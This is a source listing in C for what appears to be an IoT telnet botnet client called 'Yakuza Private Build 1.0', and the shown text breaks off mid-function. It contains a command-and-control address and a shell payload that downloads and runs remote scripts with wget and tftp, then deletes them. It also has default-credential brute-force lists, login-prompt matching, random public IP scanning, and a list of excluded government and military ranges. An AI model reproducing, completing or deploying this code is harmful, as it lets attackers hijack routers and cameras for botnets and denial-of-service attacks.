Yakuza Private Build 1.0 (CNC)

1. // Yakuza Private Build 1.0
2. // Made by Scarface.
3. // @APIGOD
4. #include <stdlib.h>
5. #include <stdarg.h>
6. #include <stdio.h>
7. #include <sys/socket.h>
8. #include <sys/types.h>
9. #include <netinet/in.h>
10. #include <arpa/inet.h>
11. #include <netdb.h>
12. #include <signal.h>
13. #include <strings.h>
14. #include <sys/utsname.h>
15. #include <unistd.h>
16. #include <fcntl.h>
17. #include <errno.h>
18. #include <netinet/ip.h>
19. #include <netinet/udp.h>
20. #include <netinet/tcp.h>
21. #include <sys/wait.h>
22. #include <sys/ioctl.h>
23. #include <net/if.h>
24. #include <time.h>
25. #include <dirent.h>
26. #include <limits.h>
27. #include <sys/stat.h>
28. #include <sys/time.h>
29. #include <string.h>
30. #include <stdint.h>
31. #include <stdio.h>
32. #include <sys/param.h>
33. #include <sys/time.h>
34.  
35. #define PHI 0x9e3779b9
36. #define PR_SET_NAME 15
37. #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
38. #define PAD_RIGHT 1
39. #define PAD_ZERO 2
40. #define PRINT_BUF_LEN 12
41. #define CMD_IAC 255
42. #define CMD_WILL 251
43. #define CMD_WONT 252
44. #define CMD_DO 253
45. #define CMD_DONT 254
46. #define OPT_SGA 3
47. #define SOCKBUF_SIZE 1024
48. #define STD2_SIZE 75
49. #define Version "Yakuza Build 1.0"
50.  
51. //--------------------------------------------------------------------------------------------------------------------------------------
52. //--------------------------------------------------------------------------------------------------------------------------------------
53. //--------------------------------------------------------------------------------------------------------------------------------------
54.  
55. unsigned char *commServer[] = { "127.0.0.1:23" };
56.  
57. char *payload = "cd /tmp; wget http://127.0.0.1/bins.sh; chmod 777 *; sh bins.sh; tftp -g 127.0.0.1 -r tftp.sh; chmod 777 *; sh tftp.sh; rm -rf *.sh";
58.  
59. char *tel_usernames[] =
60. {
61. "root\0",
62. "admin\0",
63. "user\0",
64. "login\0",
65. "guest\0",
66. "support\0"
67. "default\0"
68. "root\0",
69. };
70.  
71. char *tel_passwords[] =
72. {
73. "root\0",
74. "admin\0",
75. "user\0",
76. "login\0",
77. "guest\0",
78. "support\0"
79. "default\0"
80. "admin\0",
81. };
82.  
83. //--------------------------------------------------------------------------------------------------------------------------------------
84. //--------------------------------------------------------------------------------------------------------------------------------------
85. //--------------------------------------------------------------------------------------------------------------------------------------
86.  
87. char *tempdirs[] = {"/tmp/*", "/var/*", "/var/run/*", "/var/tmp/*", "/dev/netslink/*", "/dev/*", "/dev/shm/*", "/usr/*", "/opt/*", (char*) 0};
88. char *advances[] = {"mdm9625", "9615-cdp", "F600", "F660", "F609", "BCM", ":", "user", "ogin", "name", "pass", "dvrdvs", "nter", "User", "welcome", (char*)0};
89. char *fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "ailure", "bye", "exit", (char*)0};
90. char *successes[] = {"busybox", "$", "#", "shell", "dvrdvs", "mdm9625", "9615-cdp", "F600", "F660", "F609", ">", "version", "v", "system", "command", "help", "BCM", (char*)0};
91. char *advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
92.  
93. struct telstate_t {
94. int fd;
95. unsigned int ip;
96. unsigned char state;
97. unsigned char complete;
98. unsigned char usernameInd; /* username */
99. unsigned char passwordInd; /* password */
100. unsigned char tempdirsInd; /* tempdir */
101. unsigned int tTimeout; /* totalTimeout */
102. unsigned short bufUsed;
103. char *sockbuf;
104. };
105. int initConnection();
106. void makeRandomStr(unsigned char *buf, int length);
107. int sockprintf(int sock, char *formatStr, ...);
108. char *inet_ntoa(struct in_addr in);
109. int mainCommSock = 0, currentServer = -1;
110. uint32_t *pids;
111. uint32_t scanPid;
112. uint64_t numpids = 0;
113. struct in_addr ourIP;
114. unsigned char macAddress[6] = {0};
115.  
116. char *getBuild() {
117. #if defined(__x86_64__) || defined(_M_X64)
118. return "x86_64";
119. #elif defined(i386) || defined(__i386__) || defined(__i386) || defined(_M_IX86_)
120. return "x86_32";
121. #elif defined(__ARM_ARCH_2__)
122. return "ARM2";
123. #elif defined(__ARM_ARCH_3__) || defined(__ARM_ARCH_3M__)
124. return "ARM3";
125. #elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
126. return "ARM4T";
127. #elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_)
128. return "ARM5"
129. #elif defined(__ARM_ARCH_6T2_) || defined(__ARM_ARCH_6T2_)
130. return "ARM6T2";
131. #elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) || defined(__ARM_ARCH_6K__) || defined(__ARM_ARCH_6Z__) || defined(__ARM_ARCH_6ZK__)
132. return "ARM6";
133. #elif defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) || defined(__ARM_ARCH_7R__) || defined(__ARM_ARCH_7M__) || defined(__ARM_ARCH_7S__)
134. return "ARM7";
135. #elif defined(__aarch64__)
136. return "ARM64";
137. #elif defined(mips) || defined(__mips__) || defined(__mips)
138. return "MIPS";
139. #elif defined(__sh__)
140. return "SUPERH";
141. #elif defined(__powerpc) || defined(__powerpc__) || defined(__powerpc64__) || defined(__POWERPC__) || defined(__ppc__) || defined(__ppc64__) || defined(__PPC__) || defined(__PPC64__) || defined(_ARCH_PPC) || defined(_ARCH_PPC64)
142. return "POWERPC";
143. #elif defined(__sparc__) || defined(__sparc)
144. return "SPARC";
145. #elif defined(__m68k__)
146. return "M68K";
147. #else
148. return "UNKNOWN";
149. #endif
150. }
151. const char *uagents[] = {
152. "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36",
153. "FAST-WebCrawler/3.6 (atw-crawler at fast dot no; http://fast.no/support/crawler.asp)",
154. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
155. "TheSuBot/0.2 (www.thesubot.de)",
156. "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
157. "BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)",
158. "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
159. "FAST-WebCrawler/3.7 (atw-crawler at fast dot no; http://fast.no/support/crawler.asp)",
160. "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
161. "zspider/0.9-dev http://feedback.redkolibri.com/",
162. "Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
163. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
164. "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
165. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
166. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
167. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194ABaiduspider+(+http://www.baidu.com/search/spider.htm)",
168. "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko",
169. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
170. "Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15",
171. "Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0",
172. "Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
173. "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3)",
174. "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
175. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
176. "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
177. "Mozilla/5.0 (iPad; U; CPU OS 5_1 like Mac OS X) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10 UCBrowser/3.4.3.532",
178. "Mozilla/5.0 (Nintendo WiiU) AppleWebKit/536.30 (KHTML, like Gecko) NX/3.0.4.2.12 NintendoBrowser/4.3.1.11264.US",
179. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
180. "Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)",
181. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00",
182. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00",
183. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00",
184. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; cn) Opera 11.00",
185. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00",
186. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
187. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.6.01001)",
188. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)",
189. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.5.01003)",
190. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
191. "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8",
192. "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
193. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko/20100101 Firefox/11.0",
194. "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8",
195. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)",
196. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
197. "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
198. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
199. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
200. "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.01",
201. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
202. "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
203. "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
204. "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
205. "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
206. "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36",
207. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36",
208. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36",
209. "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36",
210. "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
211. };
212.  
213. static uint32_t Q[4096], c = 362436;
214. void init_rand(uint32_t x) {
215. int i;
216. Q[0] = x;
217. Q[1] = x + PHI;
218. Q[2] = x + PHI + PHI;
219. for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
220. }
221. uint32_t rand_cmwc(void) {
222. uint64_t t, a = 18782LL;
223. static uint32_t i = 4095;
224. uint32_t x, r = 0xfffffffe;
225. i = (i + 1) & 4095;
226. t = a * Q[i] + c;
227. c = (uint32_t)(t >> 32);
228. x = t + c;
229. if (x < c) {
230. x++;
231. c++;
232. }
233. return (Q[i] = r - x);
234. }
235. int contains_string(char* buffer, char** strings) {
236. int num_strings = 0, i = 0;
237. for(num_strings = 0; strings[++num_strings] != 0; );
238. for(i = 0; i < num_strings; i++) {
239. if(strcasestr(buffer, strings[i])) {
240. return 1;
241. }
242. }
243. return 0;
244. }
245. int contains_success(char* buffer) {
246. return contains_string(buffer, successes);
247. }
248. int contains_fail(char* buffer) {
249. return contains_string(buffer, fails);
250. }
251. int contains_response(char* buffer) {
252. return contains_success(buffer) || contains_fail(buffer);
253. }
254. int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size) {
255. fd_set read_set;
256. struct timeval tv;
257. tv.tv_sec = 0;
258. tv.tv_usec = timeout_usec;
259. FD_ZERO(&read_set);
260. FD_SET(fd, &read_set);
261. if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
262. return 0;
263. return recv(fd, buffer, buf_size, 0);
264. }
265. int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings) {
266. int num_bytes, i;
267. memset(buffer, 0, buf_size);
268. num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
269. if(buffer[0] == 0xFF) {
270. negotiate(fd, buffer, 3);
271. }
272.  
273. if(contains_string(buffer, strings)) {
274. return 1;
275. }
276.  
277. return 0;
278. }
279. const char* get_telstate_host(struct telstate_t* telstate) { // get host
280. struct in_addr in_addr_ip;
281. in_addr_ip.s_addr = telstate->ip;
282. return inet_ntoa(in_addr_ip);
283. }
284. void advance_telstate(struct telstate_t* telstate, int new_state) { // advance
285. if(new_state == 0) {
286. close(telstate->fd);
287. }
288. telstate->tTimeout = 0;
289. telstate->state = new_state;
290. memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
291. }
292. void reset_telstate(struct telstate_t* telstate) { // reset
293. advance_telstate(telstate, 0);
294. telstate->complete = 1;
295. }
296. void trim(char *str) {
297. int i;
298. int begin = 0;
299. int end = strlen(str) - 1;
300.  
301. while (isspace(str[begin])) begin++;
302.  
303. while ((end >= begin) && isspace(str[end])) end--;
304. for (i = begin; i <= end; i++) str[i - begin] = str[i];
305.  
306. str[i - begin] = '\0';
307. }
308. static void printchar(unsigned char **str, int c) {
309. if (str) {
310. **str = c;
311. ++(*str);
312. }
313. else (void)write(1, &c, 1);
314. }
315. static int prints(unsigned char **out, const unsigned char *string, int width, int pad) {
316. register int pc = 0, padchar = ' ';
317. if (width > 0) {
318. register int len = 0;
319. register const unsigned char *ptr;
320. for (ptr = string; *ptr; ++ptr) ++len;
321. if (len >= width) width = 0;
322. else width -= len;
323. if (pad & PAD_ZERO) padchar = '0';
324. }
325. if (!(pad & PAD_RIGHT)) {
326. for ( ; width > 0; --width) {
327. printchar (out, padchar);
328. ++pc;
329. }
330. }
331. for ( ; *string ; ++string) {
332. printchar (out, *string);
333. ++pc;
334. }
335. for ( ; width > 0; --width) {
336. printchar (out, padchar);
337. ++pc;
338. }
339. return pc;
340. }
341. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) {
342. unsigned char print_buf[PRINT_BUF_LEN];
343. register unsigned char *s;
344. register int t, neg = 0, pc = 0;
345. register unsigned int u = i;
346. if (i == 0) {
347. print_buf[0] = '0';
348. print_buf[1] = '\0';
349. return prints (out, print_buf, width, pad);
350. }
351. if (sg && b == 10 && i < 0) {
352. neg = 1;
353. u = -i;
354. }
355.  
356. s = print_buf + PRINT_BUF_LEN-1;
357. *s = '\0';
358. while (u) {
359. t = u % b;
360. if( t >= 10 )
361. t += letbase - '0' - 10;
362. *--s = t + '0';
363. u /= b;
364. }
365. if (neg) {
366. if( width && (pad & PAD_ZERO) ) {
367. printchar (out, '-');
368. ++pc;
369. --width;
370. }
371. else {
372. *--s = '-';
373. }
374. }
375.  
376. return pc + prints (out, s, width, pad);
377. }
378. static int print(unsigned char **out, const unsigned char *format, va_list args ) {
379. register int width, pad;
380. register int pc = 0;
381. unsigned char scr[2];
382. for (; *format != 0; ++format) {
383. if (*format == '%') {
384. ++format;
385. width = pad = 0;
386. if (*format == '\0') break;
387. if (*format == '%') goto out;
388. if (*format == '-') {
389. ++format;
390. pad = PAD_RIGHT;
391. }
392. while (*format == '0') {
393. ++format;
394. pad |= PAD_ZERO;
395. }
396. for ( ; *format >= '0' && *format <= '9'; ++format) {
397. width *= 10;
398. width += *format - '0';
399. }
400. if( *format == 's' ) {
401. register char *s = (char *)va_arg( args, int );
402. pc += prints (out, s?s:"(null)", width, pad);
403. continue;
404. }
405. if( *format == 'd' ) {
406. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
407. continue;
408. }
409. if( *format == 'x' ) {
410. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
411. continue;
412. }
413. if( *format == 'X' ) {
414. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
415. continue;
416. }
417. if( *format == 'u' ) {
418. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
419. continue;
420. }
421. if( *format == 'c' ) {
422. scr[0] = (unsigned char)va_arg( args, int );
423. scr[1] = '\0';
424. pc += prints (out, scr, width, pad);
425. continue;
426. }
427. }
428. else {
429. out:
430. printchar (out, *format);
431. ++pc;
432. }
433. }
434. if (out) **out = '\0';
435. va_end( args );
436. return pc;
437. }
438. int zprintf(const unsigned char *format, ...) {
439. va_list args;
440. va_start( args, format );
441. return print( 0, format, args );
442. }
443. int szprintf(unsigned char *out, const unsigned char *format, ...) {
444. va_list args;
445. va_start( args, format );
446. return print( &out, format, args );
447. }
448. int sockprintf(int sock, char *formatStr, ...) {
449. unsigned char *textBuffer = malloc(2048);
450. memset(textBuffer, 0, 2048);
451. char *orig = textBuffer;
452. va_list args;
453. va_start(args, formatStr);
454. print(&textBuffer, formatStr, args);
455. va_end(args);
456. orig[strlen(orig)] = '\n';
457. zprintf("%s\n", orig);
458. int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
459. free(orig);
460. return q;
461. }
462. int wildString(const unsigned char* pattern, const unsigned char* string) {
463. switch(*pattern) {
464. case '\0': return *string;
465. case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
466. case '?': return !(*string && !wildString(pattern+1, string+1));
467. default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
468. }
469. }
470. int getHost(unsigned char *toGet, struct in_addr *i) {
471. struct hostent *h;
472. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
473. return 0;
474. }
475. void makeRandomStr(unsigned char *buf, int length) {
476. int i = 0;
477. for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
478. }
479. int recvLine(int socket, unsigned char *buf, int bufsize) {
480. memset(buf, 0, bufsize);
481. fd_set myset;
482. struct timeval tv;
483. tv.tv_sec = 30;
484. tv.tv_usec = 0;
485. FD_ZERO(&myset);
486. FD_SET(socket, &myset);
487. int selectRtn, retryCount;
488. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
489. while(retryCount < 10) {
490. tv.tv_sec = 30;
491. tv.tv_usec = 0;
492. FD_ZERO(&myset);
493. FD_SET(socket, &myset);
494. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
495. retryCount++;
496. continue;
497. }
498. break;
499. }
500. }
501. unsigned char tmpchr;
502. unsigned char *cp;
503. int count = 0;
504. cp = buf;
505. while(bufsize-- > 1) {
506. if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
507. *cp = 0x00;
508. return -1;
509. }
510. *cp++ = tmpchr;
511. if(tmpchr == '\n') break;
512. count++;
513. }
514. *cp = 0x00;
515. return count;
516. }
517. int connectTimeout(int fd, char *host, int port, int timeout) {
518. struct sockaddr_in dest_addr;
519. fd_set myset;
520. struct timeval tv;
521. socklen_t lon;
522. int valopt;
523. long arg = fcntl(fd, F_GETFL, NULL);
524. arg |= O_NONBLOCK;
525. fcntl(fd, F_SETFL, arg);
526. dest_addr.sin_family = AF_INET;
527. dest_addr.sin_port = htons(port);
528. if(getHost(host, &dest_addr.sin_addr)) return 0;
529. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
530. int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
531. if (res < 0) {
532. if (errno == EINPROGRESS) {
533. tv.tv_sec = timeout;
534. tv.tv_usec = 0;
535. FD_ZERO(&myset);
536. FD_SET(fd, &myset);
537. if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
538. lon = sizeof(int);
539. getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
540. if (valopt) return 0;
541. }
542. else return 0;
543. }
544. else return 0;
545. }
546. arg = fcntl(fd, F_GETFL, NULL);
547. arg &= (~O_NONBLOCK);
548. fcntl(fd, F_SETFL, arg);
549. return 1;
550. }
551. int listFork() {
552. uint32_t parent, *newpids, i;
553. parent = fork();
554. if (parent <= 0) return parent;
555. numpids++;
556. newpids = (uint32_t*)malloc((numpids + 1) * 4);
557. for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
558. newpids[numpids - 1] = parent;
559. free(pids);
560. pids = newpids;
561. return parent;
562. }
563. int negotiate(int sock, unsigned char *buf, int len) {
564. unsigned char c;
565. switch (buf[1]) {
566. case CMD_IAC: return 0;
567. case CMD_WILL:
568. case CMD_WONT:
569. case CMD_DO:
570. case CMD_DONT:
571. c = CMD_IAC;
572. send(sock, &c, 1, MSG_NOSIGNAL);
573. if (CMD_WONT == buf[1]) c = CMD_DONT;
574. else if (CMD_DONT == buf[1]) c = CMD_WONT;
575. else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
576. else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
577. send(sock, &c, 1, MSG_NOSIGNAL);
578. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
579. break;
580. default:
581. break;
582. }
583.  
584. return 0;
585. }
586. int matchPrompt(char *bufStr) {
587. char *prompts = ":>%$#\0";
588. int bufLen = strlen(bufStr);
589. int i, q = 0;
590. for(i = 0; i < strlen(prompts); i++) {
591. while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
592. if(*(bufStr + bufLen - q) == prompts[i]) return 1;
593. }
594. return 0;
595. }
596. in_addr_t getRandomPublicIP() {
597. static uint8_t ipState[4] = {0};
598. ipState[0] = rand() % 223;
599. ipState[1] = rand() % 255;
600. ipState[2] = rand() % 255;
601. ipState[3] = rand() % 255;
602. while(
603. (ipState[0] == 0) ||
604. (ipState[0] == 10) ||
605. (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
606. (ipState[0] == 127) ||
607. (ipState[0] == 169 && ipState[1] == 254) ||
608. (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
609. (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
610. (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
611. (ipState[0] == 192 && ipState[1] == 168) ||
612. (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
613. (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
614. (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
615. (ipState[0] >= 224)
616. )
617. {
618. ipState[0] = rand() % 223;
619. ipState[1] = rand() % 255;
620. ipState[2] = rand() % 255;
621. ipState[3] = rand() % 255;
622. }
623. char ip[16] = {0};
624. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
625. return inet_addr(ip);
626. }
627.  
628. in_addr_t TelnetIPRanges()
629. {
630. static uint8_t ipState[4] = {0};
631. ipState[0] = rand() % 223;
632. ipState[1] = rand() % 255;
633. ipState[2] = rand() % 255;
634. ipState[3] = rand() % 255;
635. while(
636. (ipState[0] == 127) || //Loopback
637. (ipState[0] == 0) || //Invalid address space
638. (ipState[0] == 3) || //General Electric Company
639. (ipState[0] == 15) || //Hewlett-Packard Company
640. (ipState[0] == 56) || //US Postal Service
641. (ipState[0] == 10) || //Internal network
642. (ipState[0] == 25) || //Some more
643. (ipState[0] == 49) || //Some more
644. (ipState[0] == 50) || //Some more
645. (ipState[0] == 137) || //Some more
646. (ipState[0] == 6) || //Department of Defense
647. (ipState[0] == 7) || //Department of Defense
648. (ipState[0] == 11) || //Department of Defense
649. (ipState[0] == 21) || //Department of Defense
650. (ipState[0] == 22) || //Department of Defense
651. (ipState[0] == 26) || //Department of Defense
652. (ipState[0] == 28) || //Department of Defense
653. (ipState[0] == 29) || //Department of Defense
654. (ipState[0] == 30) || //Department of Defense
655. (ipState[0] == 33) || //Department of Defense
656. (ipState[0] == 55) || //Department of Defense
657. (ipState[0] == 214) || //Department of Defense
658. (ipState[0] == 215) || //Department of Defense
659. (ipState[0] == 192 && ipState[1] == 168) || //Internal network
660. (ipState[0] == 146 && ipState[1] == 17) || //Internal network
661. (ipState[0] == 146 && ipState[1] == 80) || //IANA NAT reserved
662. (ipState[0] == 146 && ipState[1] == 98) || //IANA NAT reserved
663. (ipState[0] == 146 && ipState[1] == 154) || //IANA Special use
664. (ipState[0] == 147 && ipState[1] == 159) || //Some more
665. (ipState[0] == 148 && ipState[1] == 114) || //Some more
666. (ipState[0] == 150 && ipState[1] == 125) || //Some more
667. (ipState[0] == 150 && ipState[1] == 133) || //Some more
668. (ipState[0] == 150 && ipState[1] == 144) || //Some more
669. (ipState[0] == 150 && ipState[1] == 149) || //Some more
670. (ipState[0] == 150 && ipState[1] == 157) || //Some more
671. (ipState[0] == 150 && ipState[1] == 184) || //Some more
672. (ipState[0] == 150 && ipState[1] == 190) || //Some more
673. (ipState[0] == 150 && ipState[1] == 196) || //Some more
674. (ipState[0] == 152 && ipState[1] == 82) || //Some more
675. (ipState[0] == 152 && ipState[1] == 229) || //Some more
676. (ipState[0] == 157 && ipState[1] == 202) || //Some more
677. (ipState[0] == 157 && ipState[1] == 217) || //Some more
678. (ipState[0] == 161 && ipState[1] == 124) || //Some more
679. (ipState[0] == 162 && ipState[1] == 32) || //Some more
680. (ipState[0] == 155 && ipState[1] == 96) || //Some more
681. (ipState[0] == 155 && ipState[1] == 149) || //Some more
682. (ipState[0] == 155 && ipState[1] == 155) || //Some more
683. (ipState[0] == 155 && ipState[1] == 178) || //Some more
684. (ipState[0] == 164 && ipState[1] == 158) || //Some more
685. (ipState[0] == 156 && ipState[1] == 9) || //Some more
686. (ipState[0] == 167 && ipState[1] == 44) || //Some more
687. (ipState[0] == 168 && ipState[1] == 68) || //Some more
688. (ipState[0] == 168 && ipState[1] == 85) || //Some more
689. (ipState[0] == 168 && ipState[1] == 102) || //Some more
690. (ipState[0] == 203 && ipState[1] == 59) || //Some more
691. (ipState[0] == 204 && ipState[1] == 34) || //Some more
692. (ipState[0] == 207 && ipState[1] == 30) || //Some more
693. (ipState[0] == 117 && ipState[1] == 55) || //Some more
694. (ipState[0] == 117 && ipState[1] == 56) || //Some more
695. (ipState[0] == 80 && ipState[1] == 235) || //Some more
696. (ipState[0] == 207 && ipState[1] == 120) || //Some more
697. (ipState[0] == 209 && ipState[1] == 35) || //Some more
698. (ipState[0] == 64 && ipState[1] == 70) || //Some more
699. (ipState[0] == 172 && ipState[1] >= 16 && ipState[1] < 32) || //Some more
700. (ipState[0] == 100 && ipState[1] >= 64 && ipState[1] < 127) || //Some more
701. (ipState[0] == 169 && ipState[1] == 254) || //Some more
702. (ipState[0] == 198 && ipState[1] >= 18 && ipState[1] < 20) || //Some more
703. (ipState[0] == 64 && ipState[1] >= 69 && ipState[1] < 227) || //Some more
704. (ipState[0] == 128 && ipState[1] >= 35 && ipState[1] < 237) || //Some more
705. (ipState[0] == 129 && ipState[1] >= 22 && ipState[1] < 255) || //Some more
706. (ipState[0] == 130 && ipState[1] >= 40 && ipState[1] < 168) || //Some more
707. (ipState[0] == 131 && ipState[1] >= 3 && ipState[1] < 251) || //Some more
708. (ipState[0] == 132 && ipState[1] >= 3 && ipState[1] < 251) || //Some more
